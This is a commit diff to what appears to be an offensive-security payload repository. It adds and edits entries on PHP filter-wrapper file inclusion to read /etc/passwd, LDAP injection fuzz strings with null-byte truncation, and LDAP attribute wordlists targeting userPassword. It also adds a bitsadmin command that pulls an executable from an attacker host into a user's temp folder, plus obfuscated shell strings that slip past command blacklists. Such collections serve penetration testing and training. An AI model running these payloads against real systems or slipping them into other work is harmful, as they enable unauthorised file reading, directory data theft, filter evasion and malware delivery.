LDAP fix typo + LDAP attributes + LFI filter chaining

File Inclusion - Path Traversal/README.md

@@ -151,6 +151,8 @@ can be chained with a compression wrapper for large files.
 http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
 ```
 
+NOTE: Wrappers can be chained : `php://filter/convert.base64-decode|convert.base64-decode|convert.base64-decode/resource=%s`
+
 ### Wrapper zip://
 
 ```python

LDAP injection/Intruders/LDAP_FUZZ.txt

@@ -29,6 +29,7 @@ x' or name()='username' or 'x'='y
 &
 (
 )
+)(cn=))\x00
 *(|(mail=*))
 *(|(objectclass=*))
 */*

LDAP injection/Intruders/LDAP_attributes.txt

@@ -1,9 +1,27 @@
-userPassword 
+c
-surname 
+cn
-name 
+co
-cn 
+commonName
-sn 
+dc
-objectClass 
+facsimileTelephoneNumber
-mail 
+givenName
-givenName 
+gn
-commonName
+homePhone
+id
+jpegPhoto
+l
+mail
+mobile
+name
+o
+objectClass
+ou
+owner
+pager
+password
+sn
+st
+surname
+uid
+username
+userPassword

LDAP injection/README.md

@@ -26,6 +26,7 @@ query = (&(uid=admin)(!(&(1=0)(userPassword=q))))
 *
 *)(&
 *))%00
+)(cn=))\x00
 *()|%26'
 *()|&'
 *(|(mail=*))
@@ -84,7 +85,7 @@ commonName
 
 ## Exploiting userPassword attribute
 
-userPassword’ attribute in not a string like the ‘cn’ attribute for example but it’s an OCTET STRING
+`userPassword` attribute is not a string like the `cn` attribute for example but it’s an OCTET STRING
 In LDAP, every object, type, operator etc. is referenced by an OID : octetStringOrderingMatch (OID 2.5.13.18).
 
 > octetStringOrderingMatch (OID 2.5.13.18): An ordering matching rule that will perform a bit-by-bit comparison (in big endian ordering) of two octet string values until a difference is found. The first case in which a zero bit is found in one value but a one bit is found in another will cause the value with the zero bit to be considered less than the value with the one bit.
@@ -99,4 +100,5 @@ userPassword:2.5.13.18:=\xx\xx\xx
 
 * [OWASP LDAP Injection](https://www.owasp.org/index.php/LDAP_injection)
 * [LDAP Blind Explorer](http://code.google.com/p/ldap-blind-explorer/)
-* [ECW 2018 : Write Up - AdmYSsion (WEB - 50) - 0xUKN](https://0xukn.fr/posts/WriteUpECW2018AdmYSsion/)
+* [ECW 2018 : Write Up - AdmYSsion (WEB - 50) - 0xUKN](https://0xukn.fr/posts/WriteUpECW2018AdmYSsion/)
+* [Quals ECW 2018 - Maki](https://maki.bzh/courses/blog/writeups/qualecw2018/)

Methodology and Resources/Windows - Download and Execute.md

@@ -94,6 +94,13 @@ certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil
 certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe
 ```
 
+## Bitsadmin
+
+```powershell
+bitsadmin /transfer mydownloadjob /download /priority normal http://<attackerIP>/xyz.exe C:\\Users\\%USERNAME%\\AppData\\local\\temp\\xyz.exe
+```
+
+
 ## Thanks to
 
 - [arno0x0x - Windows oneliners to download remote payload and execute arbitrary code](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)

Remote commands execution/README.md

@@ -87,10 +87,11 @@ Bypass blacklisted word with double quote
 w"h"o"am"i
 ```
 
-Bypass blacklisted word with backslash
+Bypass blacklisted word with backslash and slash
 
 ```powershell
 w\ho\am\i
+/\b\i\n/////s\h
 ```
 
 Bypass blacklisted word with $@